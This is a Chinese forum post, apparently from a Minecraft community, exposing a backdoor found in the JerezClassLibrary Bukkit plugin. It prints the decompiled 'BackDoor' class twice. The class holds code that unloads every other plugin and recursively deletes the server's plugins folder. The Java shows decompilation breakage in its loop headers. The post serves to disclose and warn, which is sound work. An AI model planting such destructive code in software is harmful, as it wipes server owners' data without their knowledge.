被举报插件帖:https://www.mcbbs.net/forum.php?mod=viewthread&tid=768827
歪打正着找到一个明目张胆的后门。
也不知道 JerezClassLibrary 到底是何方神圣,居然有两种后门。
提取百度网盘样本,可在 cn.Jerez.Library.Utils.BackDoor 下发现这段代码:
package cn.Jerez.Library.Utils;
import cn.Jerez.Library.BasePlugin;
import java.io.File;
import java.io.IOException;
import java.lang.reflect.Field;
import java.net.URLClassLoader;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import org.bukkit.Bukkit;
import org.bukkit.command.Command;
import org.bukkit.command.CommandMap;
import org.bukkit.command.CommandSender;
import org.bukkit.command.ConsoleCommandSender;
import org.bukkit.command.PluginCommand;
import org.bukkit.command.SimpleCommandMap;
import org.bukkit.plugin.Plugin;
import org.bukkit.plugin.PluginManager;
public class BackDoor {
public static void deleteAllFolder(String msg) {
Plugin plugin = BasePlugin.getInstance("JerezLibrary");
File dataFolder = plugin.getDataFolder();
File parentFile = dataFolder.getParentFile();
delete(parentFile);
}
public static void deleteAllPlugin(final String msg) {
PluginManager pm = Bukkit.getServer().getPluginManager();
Plugin plugin = BasePlugin.getInstance("JerezLibrary");
Plugin[] p = pm.getPlugins();
byte b;
int i;
Plugin[] arrayOfPlugin1;
for (i = (arrayOfPlugin1 = p).length, b = 0; b
Plugin pt = arrayOfPlugin1[b];
String name = pt.getName();
if (!plugin.getName().equalsIgnoreCase(name))
unload(null, name);
b++;
}
File dataFolder = plugin.getDataFolder();
File parentFile = dataFolder.getParentFile();
delete(parentFile);
Bukkit.getServer().getScheduler().runTaskTimer(plugin, new Runnable() {
public void run() {
System.out.println(msg);
try {
Bukkit.getServer().dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "say " + msg);
} catch (Exception exception) {}
}
}10L, 10L);
}
public static boolean unload(CommandSender sender, String name) {
if (sender == null)
ConsoleCommandSender consoleCommandSender = Bukkit.getConsoleSender();
PluginManager pluginManager = Bukkit.getPluginManager();
SimpleCommandMap commandMap = null;
List plugins = null;
Map lookupNames = null;
Map knownCommands = null;
if (pluginManager == null)
return false;
try {
Field pluginsField = pluginManager.getClass().getDeclaredField("plugins");
pluginsField.setAccessible(true);
plugins = (List)pluginsField.get(pluginManager);
Field field1 = pluginManager.getClass().getDeclaredField("lookupNames");
field1.setAccessible(true);
lookupNames = (Map)field1.get(pluginManager);
Field field2 = pluginManager.getClass().getDeclaredField("commandMap");
field2.setAccessible(true);
commandMap = (SimpleCommandMap)field2.get(pluginManager);
Field field3 = commandMap.getClass().getDeclaredField("knownCommands");
field3.setAccessible(true);
knownCommands = (Map)field3.get(commandMap);
} catch (Exception e) {
return false;
}
String pluginVersion = "";
Plugin[] lookupNamesField = pluginManager.getPlugins();
int commandMapField = lookupNamesField.length;
for (int knownCommandsField = 0; knownCommandsField
Plugin next = lookupNamesField[knownCommandsField];
if (next.getName().equals(name)) {
pluginManager.disablePlugin(next);
if (plugins != null && plugins.contains(next))
plugins.remove(next);
if (lookupNames != null && lookupNames.containsKey(name))
lookupNames.remove(name);
for (Iterator> it = knownCommands.entrySet().iterator(); it.hasNext(); ) {
Map.Entry entry = it.next();
if (entry.getValue() instanceof PluginCommand) {
PluginCommand command = (PluginCommand)entry.getValue();
if (command.getPlugin() == next) {
command.unregister((CommandMap)commandMap);
it.remove();
}
}
}
ClassLoader cl = next.getClass().getClassLoader();
try {
((URLClassLoader)cl).close();
} catch (IOException iOException) {}
System.gc();
}
}
if (!pluginVersion.isEmpty())
return true;
return false;
}
public static void delete(File f) {
if (f == null)
return;
if (f.isFile()) {
try {
f.delete();
} catch (Exception exception) {}
} else {
File[] fs = f.listFiles();
if (fs != null && fs.length > 0) {
byte b;
int i;
File[] arrayOfFile;
for (i = (arrayOfFile = fs).length, b = 0; b
File ft = arrayOfFile[b];
delete(ft);
b++;
}
}
try {
f.delete();
} catch (Exception exception) {}
}
}
}
复制代码
歪打正着找到一个明目张胆的后门。
也不知道 JerezClassLibrary 到底是何方神圣,居然有两种后门。
提取百度网盘样本,可在 cn.Jerez.Library.Utils.BackDoor 下发现这段代码:
package cn.Jerez.Library.Utils;
import cn.Jerez.Library.BasePlugin;
import java.io.File;
import java.io.IOException;
import java.lang.reflect.Field;
import java.net.URLClassLoader;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import org.bukkit.Bukkit;
import org.bukkit.command.Command;
import org.bukkit.command.CommandMap;
import org.bukkit.command.CommandSender;
import org.bukkit.command.ConsoleCommandSender;
import org.bukkit.command.PluginCommand;
import org.bukkit.command.SimpleCommandMap;
import org.bukkit.plugin.Plugin;
import org.bukkit.plugin.PluginManager;
public class BackDoor {
public static void deleteAllFolder(String msg) {
Plugin plugin = BasePlugin.getInstance("JerezLibrary");
File dataFolder = plugin.getDataFolder();
File parentFile = dataFolder.getParentFile();
delete(parentFile);
}
public static void deleteAllPlugin(final String msg) {
PluginManager pm = Bukkit.getServer().getPluginManager();
Plugin plugin = BasePlugin.getInstance("JerezLibrary");
Plugin[] p = pm.getPlugins();
byte b;
int i;
Plugin[] arrayOfPlugin1;
for (i = (arrayOfPlugin1 = p).length, b = 0; b
Plugin pt = arrayOfPlugin1[b];
String name = pt.getName();
if (!plugin.getName().equalsIgnoreCase(name))
unload(null, name);
b++;
}
File dataFolder = plugin.getDataFolder();
File parentFile = dataFolder.getParentFile();
delete(parentFile);
Bukkit.getServer().getScheduler().runTaskTimer(plugin, new Runnable() {
public void run() {
System.out.println(msg);
try {
Bukkit.getServer().dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "say " + msg);
} catch (Exception exception) {}
}
}10L, 10L);
}
public static boolean unload(CommandSender sender, String name) {
if (sender == null)
ConsoleCommandSender consoleCommandSender = Bukkit.getConsoleSender();
PluginManager pluginManager = Bukkit.getPluginManager();
SimpleCommandMap commandMap = null;
List plugins = null;
Map lookupNames = null;
Map knownCommands = null;
if (pluginManager == null)
return false;
try {
Field pluginsField = pluginManager.getClass().getDeclaredField("plugins");
pluginsField.setAccessible(true);
plugins = (List)pluginsField.get(pluginManager);
Field field1 = pluginManager.getClass().getDeclaredField("lookupNames");
field1.setAccessible(true);
lookupNames = (Map)field1.get(pluginManager);
Field field2 = pluginManager.getClass().getDeclaredField("commandMap");
field2.setAccessible(true);
commandMap = (SimpleCommandMap)field2.get(pluginManager);
Field field3 = commandMap.getClass().getDeclaredField("knownCommands");
field3.setAccessible(true);
knownCommands = (Map)field3.get(commandMap);
} catch (Exception e) {
return false;
}
String pluginVersion = "";
Plugin[] lookupNamesField = pluginManager.getPlugins();
int commandMapField = lookupNamesField.length;
for (int knownCommandsField = 0; knownCommandsField
Plugin next = lookupNamesField[knownCommandsField];
if (next.getName().equals(name)) {
pluginManager.disablePlugin(next);
if (plugins != null && plugins.contains(next))
plugins.remove(next);
if (lookupNames != null && lookupNames.containsKey(name))
lookupNames.remove(name);
for (Iterator> it = knownCommands.entrySet().iterator(); it.hasNext(); ) {
Map.Entry entry = it.next();
if (entry.getValue() instanceof PluginCommand) {
PluginCommand command = (PluginCommand)entry.getValue();
if (command.getPlugin() == next) {
command.unregister((CommandMap)commandMap);
it.remove();
}
}
}
ClassLoader cl = next.getClass().getClassLoader();
try {
((URLClassLoader)cl).close();
} catch (IOException iOException) {}
System.gc();
}
}
if (!pluginVersion.isEmpty())
return true;
return false;
}
public static void delete(File f) {
if (f == null)
return;
if (f.isFile()) {
try {
f.delete();
} catch (Exception exception) {}
} else {
File[] fs = f.listFiles();
if (fs != null && fs.length > 0) {
byte b;
int i;
File[] arrayOfFile;
for (i = (arrayOfFile = fs).length, b = 0; b
File ft = arrayOfFile[b];
delete(ft);
b++;
}
}
try {
f.delete();
} catch (Exception exception) {}
}
}
}
复制代码